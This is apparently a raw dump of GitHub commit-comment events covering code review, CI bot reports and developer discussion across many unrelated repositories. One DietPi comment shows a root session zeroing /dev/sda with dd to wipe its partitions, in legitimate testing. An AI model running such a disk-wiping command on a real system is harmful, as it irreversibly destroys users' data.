{"id":"7908851935","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29571972,"position":25,"line":25,"path":"CSharpPT7/ListaDeContas.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T20:46:15Z","updated_at":"2018-07-02T20:46:15Z","author_association":"OWNER","body":"Tbm pensei isso, mas a motivação para usar listas é nos livrar do trabalho de pensar em índices e essas preocupações adicionais, então achei mais interessante esconder a implementação interna da lista. O curso do nico tá assim tbm. O que você acha? \r\n\r\nOutra alternativa que vejo é:\r\n - Cria segundo construtor com este argumento.\r\n - Mas, a diferença entre os construtores é muito pequena.\r\n - Mostrar parâmetro opcional\r\n\r\n```\r\npublic Lista(int tamanho = 5) { ... }\r\n\r\nnew Lista(10);\r\nnew Lista(); // compilador transforma em new Lista(5)\r\n```"}},"created_at":"2018-07-02T20:46:15Z"}
{"id":"7908852045","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29571974,"position":null,"line":null,"path":null,"commit_id":"7c9b7e8956fa72746368b39b5754f4d332ea8bed","created_at":"2018-07-02T20:46:17Z","updated_at":"2018-07-02T20:46:17Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-39](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-39).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-39-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-02T20:46:17Z"}
{"id":"7908854724","type":"CommitCommentEvent","actor":{"login":"uBlock-user"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29571977,"position":null,"line":null,"path":null,"commit_id":"c2f78df5d5e3e164bbc0082fbe9195f91ef4f608","created_at":"2018-07-02T20:46:54Z","updated_at":"2018-07-02T20:46:54Z","author_association":"MEMBER","body":"You may wanna remove those two filters in 1938 and 1939, they're redundant."}},"created_at":"2018-07-02T20:46:54Z"}
{"id":"7908856438","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/plugins"},"payload":{"comment":{"id":29571979,"position":null,"line":null,"path":null,"commit_id":"a8c65afca15a557bc7c3788ad3cacdfee2d18467","created_at":"2018-07-02T20:47:17Z","updated_at":"2018-07-02T20:47:17Z","author_association":"MEMBER","body":"aiming for 19.1 at this time, just like bsnmpd"}},"created_at":"2018-07-02T20:47:17Z"}
{"id":"7908856501","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29571980,"position":null,"line":null,"path":null,"commit_id":"1883b2e383c6ca691950e516d140e05cdf001088","created_at":"2018-07-02T20:47:18Z","updated_at":"2018-07-02T20:47:18Z","author_association":"CONTRIBUTOR","body":"That will not last very long, we should just post a fix without adding a filter if they continue to change their detction inside a few hours."}},"created_at":"2018-07-02T20:47:18Z"}
{"id":"7908864482","type":"CommitCommentEvent","actor":{"login":"Fourdee"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29571995,"position":null,"line":null,"path":null,"commit_id":"2747fbeb522fa6b8fd3c707d4d84b1139f31c09e","created_at":"2018-07-02T20:49:02Z","updated_at":"2018-07-02T20:49:02Z","author_association":"OWNER","body":"@MichaIng \r\n\r\n> dd ... of=/dev/sda ... does not work to remove all partitions + partition table at once?\r\n\r\nStrange, it was not working in previous testing, now it is:\r\n```\r\nroot@DietPi:~# blkid\r\n/dev/mmcblk1p6: LABEL=\"rootfs\" UUID=\"ff313567-e9f1-5a5d-9895-3ba130b4a864\" TYPE=\"ext4\"\r\n/dev/sda1: UUID=\"ae0f2845-6471-41df-83ca-ed304183a8f4\" TYPE=\"ext4\" PARTLABEL=\"primary\" PARTUUID=\"341a6f9b-d091-40db-b2af-e15a827e6646\"\r\nroot@DietPi:~# umount /dev/sda1\r\numount: /dev/sda1: not mounted.\r\nroot@DietPi:~# dd if=/dev/zero of=/dev/sda bs=4K count=1337\r\n1337+0 records in\r\n1337+0 records out\r\n5476352 bytes (5.5 MB, 5.2 MiB) copied, 0.292104 s, 18.7 MB/s\r\nroot@DietPi:~# blkid\r\n/dev/mmcblk1p6: LABEL=\"rootfs\" UUID=\"ff313567-e9f1-5a5d-9895-3ba130b4a864\" TYPE=\"ext4\"\r\n\r\n``\r\n\r\nLet me test some more."}},"created_at":"2018-07-02T20:49:02Z"}
{"id":"7908870749","type":"CommitCommentEvent","actor":{"login":"makmm"},"repo":{"name":"ProperVortex/eggcrackv2"},"payload":{"comment":{"id":29572009,"position":null,"line":null,"path":null,"commit_id":"96b1a3e33fba9ff21f52a8eed1d1d3570f6b83c0","created_at":"2018-07-02T20:50:24Z","updated_at":"2018-07-02T20:50:24Z","author_association":"NONE","body":"dis bitch rly expect to write EggCrack in batch files"}},"created_at":"2018-07-02T20:50:24Z"}
{"id":"7908870786","type":"CommitCommentEvent","actor":{"login":"uBlock-user"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29572010,"position":null,"line":null,"path":null,"commit_id":"1883b2e383c6ca691950e516d140e05cdf001088","created_at":"2018-07-02T20:50:25Z","updated_at":"2018-07-02T20:50:25Z","author_association":"MEMBER","body":"Yeah saw the heat trail of new reports on the issue tracker, for me it was working fine until just an hour ago."}},"created_at":"2018-07-02T20:50:25Z"}
{"id":"7908871381","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29572012,"position":null,"line":null,"path":null,"commit_id":"e3e7faaa31cb35b8b21e61ac72fc762c6b4ced7f","created_at":"2018-07-02T20:50:32Z","updated_at":"2018-07-02T20:50:32Z","author_association":"OWNER","body":"Automatic build report for commit e3e7faaa31cb35b8b21e61ac72fc762c6b4ced7f:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-9.95-brightgreen.svg)](#)\n"}},"created_at":"2018-07-02T20:50:32Z"}
{"id":"7908871818","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29572013,"position":null,"line":null,"path":null,"commit_id":"e3e7faaa31cb35b8b21e61ac72fc762c6b4ced7f","created_at":"2018-07-02T20:50:37Z","updated_at":"2018-07-02T20:50:37Z","author_association":"OWNER","body":"Automatic build report for commit e3e7faaa31cb35b8b21e61ac72fc762c6b4ced7f:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-9.95-brightgreen.svg)](#)\n"}},"created_at":"2018-07-02T20:50:37Z"}
{"id":"7908872359","type":"CommitCommentEvent","actor":{"login":"shivendra14"},"repo":{"name":"google/flatbuffers"},"payload":{"comment":{"id":29572014,"position":null,"line":null,"path":null,"commit_id":"a2fe49b498955bc70c0cafc037a2ccd8b1b843d0","created_at":"2018-07-02T20:50:45Z","updated_at":"2018-07-02T20:50:45Z","author_association":"CONTRIBUTOR","body":"Prior to name space there are includes too..\nCan you point where would the changes be needed. I will add a pr.\n\nWe just add copyright header everywhere!  Redundant but yes :/"}},"created_at":"2018-07-02T20:50:45Z"}
{"id":"7908875219","type":"CommitCommentEvent","actor":{"login":"PrOF-kk"},"repo":{"name":"PrOF-kk/Gang-Garrison-2"},"payload":{"comment":{"id":29572021,"position":null,"line":null,"path":null,"commit_id":"aa30e1f9556273586bd00bb3195245e2a067bb08","created_at":"2018-07-02T20:51:23Z","updated_at":"2018-07-02T20:51:23Z","author_association":"OWNER","body":"This commit also changes the domination counter scaling to 1, to avoid horrible issues"}},"created_at":"2018-07-02T20:51:23Z"}
{"id":"7908876938","type":"CommitCommentEvent","actor":{"login":"anagrius"},"repo":{"name":"humio/docs.humio.com"},"payload":{"comment":{"id":29572024,"position":52,"line":94,"path":"content/parsers/pipeline.md","commit_id":"47a113bf6d6a2f65db9e35a366bc103fc5165b87","created_at":"2018-07-02T20:51:43Z","updated_at":"2018-07-02T20:51:43Z","author_association":"CONTRIBUTOR","body":"Agree. This changes the current case semantics though"}},"created_at":"2018-07-02T20:51:43Z"}
{"id":"7908880028","type":"CommitCommentEvent","actor":{"login":"MJZ1977"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29572031,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-02T20:52:21Z","updated_at":"2018-07-02T20:52:21Z","author_association":"NONE","body":"Heh. It seems like a compilation of yellow \"patches\". I hope it passes.\r\n\r\nGL !"}},"created_at":"2018-07-02T20:52:21Z"}
{"id":"7908881707","type":"CommitCommentEvent","actor":{"login":"TatianaKobets"},"repo":{"name":"TatianaKobets/tatianakobets.github.io"},"payload":{"comment":{"id":29572032,"position":null,"line":null,"path":null,"commit_id":"900ef265cab5ba94bfa7aa06da9d6d7c2e1c6041","created_at":"2018-07-02T20:52:40Z","updated_at":"2018-07-02T20:52:40Z","author_association":"OWNER","body":"Удаление строки"}},"created_at":"2018-07-02T20:52:40Z"}
{"id":"7908882802","type":"CommitCommentEvent","actor":{"login":"cairface"},"repo":{"name":"Windower/packages"},"payload":{"comment":{"id":29572034,"position":5,"line":16,"path":"linkshell_service/linkshell_service.lua","commit_id":"b622481db76f5b1118a811c8b22bc03f062f2723","created_at":"2018-07-02T20:52:53Z","updated_at":"2018-07-02T20:52:53Z","author_association":"MEMBER","body":"linkshell.data[1]"}},"created_at":"2018-07-02T20:52:53Z"}
{"id":"7908884322","type":"CommitCommentEvent","actor":{"login":"jvperrin"},"repo":{"name":"ocf/dns"},"payload":{"comment":{"id":29572038,"position":null,"line":null,"path":null,"commit_id":"fdc00a844a670e5662eaa349d2173234cfa8ac2f","created_at":"2018-07-02T20:53:14Z","updated_at":"2018-07-02T20:53:14Z","author_association":"MEMBER","body":"Whoops, didn't bump the serial, but that's fine, it's not a big deal if it propagates or not right now."}},"created_at":"2018-07-02T20:53:14Z"}
{"id":"7908887411","type":"CommitCommentEvent","actor":{"login":"cairface"},"repo":{"name":"Windower/packages"},"payload":{"comment":{"id":29572049,"position":5,"line":16,"path":"linkshell_service/linkshell_service.lua","commit_id":"b622481db76f5b1118a811c8b22bc03f062f2723","created_at":"2018-07-02T20:53:55Z","updated_at":"2018-07-02T20:53:55Z","author_association":"MEMBER","body":"Line 24 and 33 have the same problem"}},"created_at":"2018-07-02T20:53:55Z"}
{"id":"7908888032","type":"CommitCommentEvent","actor":{"login":"jessegreenberg"},"repo":{"name":"phetsims/energy-skate-park"},"payload":{"comment":{"id":29572050,"position":null,"line":null,"path":null,"commit_id":"50d7e4ae6f0f18eefb176de248a754dd5052a314","created_at":"2018-07-02T20:54:04Z","updated_at":"2018-07-02T20:54:04Z","author_association":"CONTRIBUTOR","body":"Was for https://github.com/phetsims/energy-skate-park-basics/issues/404"}},"created_at":"2018-07-02T20:54:04Z"}
{"id":"7908888035","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29572051,"position":null,"line":null,"path":null,"commit_id":"3fefa9343ab93e61f0e83639a4bf95590282dfb4","created_at":"2018-07-02T20:54:04Z","updated_at":"2018-07-02T20:54:04Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-42](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-42).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-42-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-02T20:54:04Z"}
{"id":"7908888710","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572057,"position":25,"line":25,"path":"CSharpPT7/ListaDeContas.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T20:54:13Z","updated_at":"2018-07-02T20:54:13Z","author_association":"NONE","body":"Acho legal a ideia de mostrar o parâmetro adicional sim e você pode discutir com o aluno a ideia de esconder este tipo de detalhe de implementação, dizer que não queremos ficar nos preocupando com isso."}},"created_at":"2018-07-02T20:54:13Z"}
{"id":"7908892211","type":"CommitCommentEvent","actor":{"login":"furlongm"},"repo":{"name":"bloomberg/chef-bcpc"},"payload":{"comment":{"id":29572059,"position":5,"line":4,"path":"ansible/group_vars/all","commit_id":"e689438b2a0c129658dd0fe1c81414ba8e9a5eca","created_at":"2018-07-02T20:55:00Z","updated_at":"2018-07-02T20:55:00Z","author_association":"CONTRIBUTOR","body":"That depends on the system. e.g.\r\n\r\n```\r\n$ /usr/bin/env python --version\r\nPython 3.7.0\r\n```\r\n\r\nI was going to suggest using update-alternatives but it looks like it might break apt if you are on xenial or older, but you could still test:\r\n\r\n```\r\nsudo update-alternatives --config python\r\n```\r\n\r\nHappy to change this anyway. Out of interest, what additional modules are required? Are they ansible modules?"}},"created_at":"2018-07-02T20:55:00Z"}
{"id":"7908895722","type":"CommitCommentEvent","actor":{"login":"Rawllince18"},"repo":{"name":"udacity/project-pixel-art-maker-starter"},"payload":{"comment":{"id":29572065,"position":null,"line":null,"path":null,"commit_id":"b9ca1056c4c45330b6c78fa76451be9985d2d2e4","created_at":"2018-07-02T20:55:46Z","updated_at":"2018-07-02T20:55:46Z","author_association":"NONE","body":"$(function () {\r\n\r\n// Select input\r\nlet height = $('#inputHeight');\r\nlet width = $('#inputWidth');\r\n\r\n// Select color \r\nlet colorPicker = $('#colorPicker');\r\n\r\n// Select canvas\r\nconst canvas = $('#pixelCanvas');\r\n\r\n\r\n// Make Grid when user inputs sizes\r\nfunction makeGrid() {\r\ncanvas.find('tbody').remove();\r\n\r\n// Submits the user's inputs to make the Grid\r\nlet gridHeight = $('#inputHeight').val();\r\nlet gridWidth = $('#inputWidth').val();\r\n\r\n// Adds the rows and columns \r\ncanvas.append('<tbody></tbody>');\r\n\r\nlet canvasBody = canvas.find('tbody');\r\n\r\n// Draw rows\r\nfor (let x = 0; x < gridWidth; x++) {\r\n    canvasBody.append('<tr></tr>');\r\n}\r\n\r\n// Draw columns\r\nfor (y = 0; y < gridHeight; y++) {\r\n    canvas.find('tr').append('<td></td>');\r\n}\r\n}\r\n\r\ncell = canvas.find('td');\r\n\r\n/**cell.click(function() {\r\n    var color = $('#colorPicker').val();\r\n    $(this).attr('background-color', color);\r\n});**/\r\n\r\n// The color to be shown when the user selects\r\ncanvas.on('click', \"td\", function(){\r\n    var color = $('#colorPicker').val();\r\n        $(this).attr(\"bgcolor\", color);\r\n});\r\n\r\n\r\n$(document).ready(function () {\r\n// Click the submit button to make the Grid\r\n$('button[type=\"button\"]').on('click', function (e) {\r\ne.preventDefault();\r\n    makeGrid();\r\n});\r\n\r\n});\r\n\r\n/**let addEvent = function(cell){\r\n    cell.addEventListener('click', function(){\r\n        cell.style.bgcolor = color.val();\r\n    });\r\n}**/\r\n$(\"td\").click(function() {\r\n    $(this).css(\"bgcolor\", color.val());\r\n  });\r\n});\r\n\r\n//Animation\r\n$('#pixelArtMaker').addClass('animated infinite shake');\r\n$('#pixelArtTop').addClass('animated bounceInDown');\r\n$('#pixelArtDown').addClass('animated bounceInUp')\r\n"}},"created_at":"2018-07-02T20:55:46Z"}
{"id":"7908896484","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29572067,"position":null,"line":null,"path":null,"commit_id":"e100a92d128c33361368608e8b959a8360caf668","created_at":"2018-07-02T20:55:57Z","updated_at":"2018-07-02T20:55:57Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-serch](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-serch).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-serch-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-02T20:55:57Z"}
{"id":"7908904615","type":"CommitCommentEvent","actor":{"login":"teleshoes"},"repo":{"name":"taffybar/taffybar"},"payload":{"comment":{"id":29572079,"position":null,"line":null,"path":null,"commit_id":"c235869350a74f829e49d94ccebca0df22643841","created_at":"2018-07-02T20:57:47Z","updated_at":"2018-07-02T20:57:47Z","author_association":"CONTRIBUTOR","body":"thanks. here's hoping! im going to stick with 2f2e2aa for the meantime. let me know if you want me to try out master."}},"created_at":"2018-07-02T20:57:47Z"}
{"id":"7908905587","type":"CommitCommentEvent","actor":{"login":"F43nd1r"},"repo":{"name":"ACRA/acra"},"payload":{"comment":{"id":29572081,"position":null,"line":null,"path":null,"commit_id":"05e9a5384a981f905913b524f323108838154fe7","created_at":"2018-07-02T20:58:00Z","updated_at":"2018-07-02T20:58:00Z","author_association":"CONTRIBUTOR","body":"> I think in the custom Dialog where you extend the provided base object the API move from using create in the subclass to init was in the javadoc but not the migration guide\r\n\r\nThis change was already in later versions of 4, which is why it is not noted in the migration guide. Same for\r\n\r\n> Also the need for \":acra\" in the Manifest was after the switch from 4.6 to >=4.7 with the worker thread and it wasn't noted in Migration but was in BasicSetup\r\n\r\n---\r\n\r\n> If people are going to Oreo and using Notifications they need to know to assign a channel to that interaction method (we aren't, but I noted that)\r\n\r\nIf using annotations, `@AcraNotification` doesn't have a default value for `resChannelName`, which means it is required. Added a note to https://github.com/ACRA/acra/wiki/Interactions#notification anyways.\r\n\r\n---\r\n\r\n> If people have dev settings on the device for no activity saving and no background services, the Toast notification lingers until the app is killed post-send, as the hide toast message from the looper can't be sent because of a dead object exception.\r\n\r\nThat doesn't sound good. Any ideas how one would work around that?\r\n\r\n---\r\n\r\n> Other than that, I was a little unsure when I got the main CoreConfigurationBuilder, then chained more than one plugin ConfigurationBuilders off of it that when I did an .init at the end it would all come together.\r\n\r\nAdded example configurations at https://github.com/ACRA/acra/wiki/Examples#example-builder-configuration, and linked them at https://github.com/ACRA/acra/wiki/BasicSetup#2-configuration. Feel free to add more examples if you feel like they provide something the existing ones don't.\r\n\r\n---\r\n\r\n> ACRA.init can only be called once making configuration testing a bit tricky.\r\n\r\nACRA.init being single use has always been this way. There was some discussion in https://github.com/ACRA/acra/pull/439#issuecomment-215555497. I think it should be safe to allow. I'll check for sideeffects.\r\n\r\n> What if you want to change the configuration post-init? Is that possible?\r\n\r\nNot allowing configuration changes is a design choice made by previous developers which I don't fully support. I think I'll make it possible but discourage usage for anything else than testing.\r\n\r\n---\r\n\r\n> And I would love to have the ability to programmatically trigger ACRA as if the app crashed, and have a TestSender I could easily register that would get the whole report all wrapped up in a way that was ready to inspect/assert on.\r\n\r\nSounds like a combination of `ACRA.getErrorReporter().handleException(...)` and `ReportingAdministrator.shouldSendReport` will do what you want.\r\n\r\n---\r\n\r\n> Totally separately, I was unable to get acra-storage / acralyzer couchdb replication to work in Cloudant using the easy method described in the documentation and had to use the manual method.\r\n\r\nReplication requires an prototype database. That databse is hosted on a server controlled by the developer of acralyzer, which has issues. The issue is known: https://github.com/ACRA/acralyzer/issues/133. Sorry, nothing I can do there.\r\n\r\n--- \r\n\r\n> All in all for a big API change upgrade, it was a good experience but you seem sincerely curious so I gave you everything for feedback :-). Thanks for a great project in ACRA and acralyzer, they are very useful for us.\r\n\r\nThanks for taking the time and writing this all down :-). I think it is always important to hear opinions and experiences other than mine, especially on the documentation. In the end a lot of things which seem obvious to me as the developer aren't obvious to the user.\r\n\r\n\r\n"}},"created_at":"2018-07-02T20:58:00Z"}
{"id":"7908905759","type":"CommitCommentEvent","actor":{"login":"zhan4139"},"repo":{"name":"deadcoder0904/react-native-darkmode-list"},"payload":{"comment":{"id":29572082,"position":null,"line":null,"path":null,"commit_id":"18c54894ab2aa504acea2291e442689f781295f8","created_at":"2018-07-02T20:58:02Z","updated_at":"2018-07-02T20:58:02Z","author_association":"NONE","body":"I'm glad you fixed the iusse, my appsync version was 1.0.23, once I upgrades to 1.0.23, the problem get solved.......:sigh. I think it is more of appsync problem? I checked their [release note](https://github.com/awslabs/aws-mobile-appsync-sdk-js/compare/aws-appsync@1.0.23...master), didn't find what version of apollo they are working with."}},"created_at":"2018-07-02T20:58:02Z"}
{"id":"7908905888","type":"CommitCommentEvent","actor":{"login":"furlongm"},"repo":{"name":"bloomberg/chef-bcpc"},"payload":{"comment":{"id":29572083,"position":5,"line":4,"path":"ansible/group_vars/all","commit_id":"e689438b2a0c129658dd0fe1c81414ba8e9a5eca","created_at":"2018-07-02T20:58:04Z","updated_at":"2018-07-02T20:58:04Z","author_association":"CONTRIBUTOR","body":"https://docs.ansible.com/ansible/latest/modules/apt_module.html is the module\r\n\r\nDepending on version of interpreter. It tries to install python-apt without access to proxy, which causes failures."}},"created_at":"2018-07-02T20:58:04Z"}
{"id":"7908905949","type":"CommitCommentEvent","actor":{"login":"MattL019"},"repo":{"name":"MattL019/hurlpic-frontend"},"payload":{"comment":{"id":29572084,"position":7,"line":25,"path":"src/app/app.module.ts","commit_id":"15839088df943647a807912206d5c81c7089b8f5","created_at":"2018-07-02T20:58:05Z","updated_at":"2018-07-02T20:58:05Z","author_association":"OWNER","body":"Added a redirect for the 'login' path"}},"created_at":"2018-07-02T20:58:05Z"}
{"id":"7908906416","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29572087,"position":null,"line":null,"path":null,"commit_id":"ace993d49d5c12502b01edf5d69521f27b969869","created_at":"2018-07-02T20:58:11Z","updated_at":"2018-07-02T20:58:11Z","author_association":"OWNER","body":"squashed. Should I also proceed to merge all machines in a single commit? \r\nIf I understood correctly, it would either be 3 commits:\r\n1) qgraph & test-qgraph\r\n2) machines, buses, devices\r\n3) gtest integration & tests (or these two separated?)\r\nor \r\n1) qgraph & test-qgraph\r\n2) machines\r\n3) buses \r\n4) devices\r\n5) gtest integration & tests (or these two separated?)"}},"created_at":"2018-07-02T20:58:11Z"}
{"id":"7908907196","type":"CommitCommentEvent","actor":{"login":"MattL019"},"repo":{"name":"MattL019/hurlpic-frontend"},"payload":{"comment":{"id":29572089,"position":8,"line":26,"path":"src/app/app.module.ts","commit_id":"15839088df943647a807912206d5c81c7089b8f5","created_at":"2018-07-02T20:58:20Z","updated_at":"2018-07-02T20:58:20Z","author_association":"OWNER","body":"Added a redirect for the 'register' path"}},"created_at":"2018-07-02T20:58:20Z"}
{"id":"7908908092","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572091,"position":34,"line":34,"path":"CSharpPT7/ListaDeContas.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T20:58:31Z","updated_at":"2018-07-02T20:58:31Z","author_association":"OWNER","body":"Eu gostei dessa implementação porque ela permite `Adicionar(null)`. Muitas coleções no .NET permitem `Add(null)`, como List, ArrayList, Queue, etc. Se fizermos dessa forma, vamos precisar aumentar a complexidade desse método, colocar null check, mudar onde fica o `VerificarCapacidade` e tal, talvez a complexidade que esse método ganhe fique maior que o que poupamos no `Remover`. O que você acha?"}},"created_at":"2018-07-02T20:58:31Z"}
{"id":"7908909534","type":"CommitCommentEvent","actor":{"login":"MattL019"},"repo":{"name":"MattL019/hurlpic-frontend"},"payload":{"comment":{"id":29572096,"position":null,"line":null,"path":null,"commit_id":"15839088df943647a807912206d5c81c7089b8f5","created_at":"2018-07-02T20:58:51Z","updated_at":"2018-07-02T20:58:51Z","author_association":"OWNER","body":"I also added redirects for the 'login' and 'register' paths"}},"created_at":"2018-07-02T20:58:51Z"}
{"id":"7908909809","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29572098,"position":null,"line":null,"path":null,"commit_id":"51751ea2249a576fecd37098884d13c0aefa9af9","created_at":"2018-07-02T20:58:55Z","updated_at":"2018-07-02T20:58:55Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - i386-Windows-7-VisualStudio-14: OK (2930 of 2930 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-02T20:58:55Z"}
{"id":"7908910874","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572102,"position":45,"line":45,"path":"CSharpPT7/ListaDeContas.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T20:59:10Z","updated_at":"2018-07-02T20:59:10Z","author_association":"OWNER","body":"Ok. No roteiro acabei mudando e deixando somente a forma de criar loop na mão mesmo!"}},"created_at":"2018-07-02T20:59:10Z"}
{"id":"7908912565","type":"CommitCommentEvent","actor":{"login":"GARENFEATHER"},"repo":{"name":"starkandwayne/ghost-for-cloudfoundry"},"payload":{"comment":{"id":29572105,"position":29,"line":156,"path":"bin/setup_and_run.sh","commit_id":"95cf5a4de7de27510375eae6fa46d3ba14be7989","created_at":"2018-07-02T20:59:32Z","updated_at":"2018-07-02T20:59:32Z","author_association":"NONE","body":"fail startup exactly, cause ERROR force the app instance exit"}},"created_at":"2018-07-02T20:59:32Z"}
{"id":"7908913023","type":"CommitCommentEvent","actor":{"login":"vspinu"},"repo":{"name":"jabranham/ESS"},"payload":{"comment":{"id":29572107,"position":5,"line":950,"path":"lisp/ess-mode.el","commit_id":"43501f19167d94dbe8ef5a604bcafe53183ec8e3","created_at":"2018-07-02T20:59:38Z","updated_at":"2018-07-02T20:59:38Z","author_association":"NONE","body":"I don't see why you need this change. Wouldn't passing the path as name be just fine? Even better, rename name -> command. "}},"created_at":"2018-07-02T20:59:38Z"}
{"id":"7908916727","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572112,"position":61,"line":61,"path":"CSharpPT7/ListaDeContas.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T21:00:26Z","updated_at":"2018-07-02T21:00:26Z","author_association":"OWNER","body":"Boa. A lógica do `Length * 2` eu roubei do código fonte do .NET. Com certeza deve haver um estudo probabilístico/empírico justificando isso. Eu vou pesquisar para comentar no vídeo"}},"created_at":"2018-07-02T21:00:26Z"}
{"id":"7908918077","type":"CommitCommentEvent","actor":{"login":"bkad"},"repo":{"name":"bkad/CamelCaseMotion"},"payload":{"comment":{"id":29572114,"position":18,"line":157,"path":"README.md","commit_id":"e2816c75c3b73f176af3e94576793b342976f0a1","created_at":"2018-07-02T21:00:44Z","updated_at":"2018-07-02T21:00:44Z","author_association":"OWNER","body":"More of a difference of provenance than feature set. This repo is a series of patches on [an older project](https://github.com/vim-scripts/camelcasemotion/commits/master). vim-wordmotion is a ground-up rewrite that came out of the frustration of grokking the regexs in this repo. vim-smartword breaks on keywords rather than camel case, but is supposedly composable with other text motion plugins."}},"created_at":"2018-07-02T21:00:44Z"}
{"id":"7908919017","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572116,"position":34,"line":34,"path":"CSharpPT7/ListaDeContas.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T21:00:55Z","updated_at":"2018-07-02T21:00:55Z","author_association":"NONE","body":"Acho que me expressei mal, seria só pra comentar as duas abordagens e dizer que como o remover já se preocupa com o *shifting* esta implementação de adicionar na próxima posição já é mais performática."}},"created_at":"2018-07-02T21:00:55Z"}
{"id":"7908919950","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29572124,"position":null,"line":null,"path":null,"commit_id":"365d46d5d492da70ba627dd5fa568a1b012cec0c","created_at":"2018-07-02T21:01:07Z","updated_at":"2018-07-02T21:01:07Z","author_association":"OWNER","body":"Automatic build report for commit 365d46d5d492da70ba627dd5fa568a1b012cec0c:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-9.95-brightgreen.svg)](#)\n"}},"created_at":"2018-07-02T21:01:07Z"}
{"id":"7908921406","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572130,"position":70,"line":70,"path":"CSharpPT7/ListaDeContas.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T21:01:23Z","updated_at":"2018-07-02T21:01:23Z","author_association":"OWNER","body":"Tbm acho! Isso é usado nos dicionários tbm: `dicionario[\"minha chave string\"]`."}},"created_at":"2018-07-02T21:01:23Z"}
